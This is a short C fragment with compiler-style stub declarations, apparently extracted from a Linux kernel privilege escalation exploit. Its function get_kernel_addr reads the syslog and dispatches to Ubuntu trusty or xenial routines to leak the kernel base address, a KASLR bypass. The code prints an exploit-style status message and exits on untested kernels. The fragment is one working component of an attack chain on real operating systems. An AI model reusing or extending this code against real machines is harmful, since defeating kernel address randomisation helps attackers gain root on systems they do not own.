
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int version; int distro; } ;


 int EXIT_FAILURE ;
 int exit (int ) ;
 unsigned long get_kernel_addr_trusty (char*,int) ;
 unsigned long get_kernel_addr_xenial (char*,int) ;
 size_t kernel ;
 TYPE_1__* kernels ;
 int mmap_syslog (char**,int*) ;
 int printf (char*) ;
 scalar_t__ strcmp (char*,int ) ;
 scalar_t__ strncmp (char*,int ,int) ;

unsigned long get_kernel_addr() {
 char* syslog;
 int size;
 mmap_syslog(&syslog, &size);

 if (strcmp("trusty", kernels[kernel].distro) == 0 &&
     strncmp("4.4.0", kernels[kernel].version, 5) == 0)
  return get_kernel_addr_trusty(syslog, size);
 if (strcmp("xenial", kernels[kernel].distro) == 0 &&
     strncmp("4.4.0", kernels[kernel].version, 5) == 0 ||
     strncmp("4.8.0", kernels[kernel].version, 5) == 0)
  return get_kernel_addr_xenial(syslog, size);

 printf("[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*");
 exit(EXIT_FAILURE);
}
